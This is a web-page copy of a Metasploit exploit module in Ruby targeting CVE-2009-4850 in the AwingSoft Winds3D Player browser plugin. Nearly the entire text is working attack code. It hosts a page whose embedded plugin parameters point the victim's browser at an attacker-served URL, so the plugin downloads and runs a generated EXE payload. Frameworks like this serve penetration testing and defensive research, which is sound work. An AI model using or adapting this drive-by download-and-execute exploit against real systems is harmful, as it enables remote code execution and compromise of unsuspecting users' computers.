Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpServer::HTML

10
  include Msf::Exploit::EXE

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',

17
        'Description' => %q{

18
          This module exploits an untrusted program execution vulnerability within the

19
          Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for

20
          IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'

21
          parameter to the URL to an executable, an attacker can execute arbitrary

22
          code.

23


24
          Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and

25
          IE 8 on Windows XP SP3.

26
        },

27
        'License' => MSF_LICENSE,

28
        'Author' => [

29
          'jduck' # original discovery & metasploit module

30
        ],

31
        'References' => [

32
          [ 'CVE', '2009-4850' ],

33
          [ 'OSVDB', '60049' ]

34
        ],

35
        'Payload' => {

36
          'Space' => 2048,

37
          'StackAdjustment' => -3500,

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          [ 'Automatic', {}],

42
        ],

43
        'DisclosureDate' => '2009-11-14',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52
  end

53


54
  def on_request_uri(cli, request)

55
    payload_url = "http://"

56
    payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']

57
    payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"

58


59
    if (request.uri.match(/payload/))

60
      return if ((p = regenerate_payload(cli)) == nil)

61


62
      data = generate_payload_exe({ :code => p.encoded })

63
      print_status("Sending EXE payload")

64
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

65


66
      # Handle the payload

67
      # handler(cli)

68
      return

69
    end

70


71
    # otherwise, send the html..

72
    html = %Q|<html>

73
<body>

74
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'

75
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>

76
<param name="SceneURL" value="#{payload_url}#">

77
<embed type="application/x-awingsoft-winds3d" src="#{payload_url}">

78
</object>

79
|

80


81
    print_status("Sending #{self.name} HTML")

82
    # Transmit the compressed response to the client

83
    send_response(cli, html, { 'Content-Type' => 'text/html' })

84
  end

85
end

86


87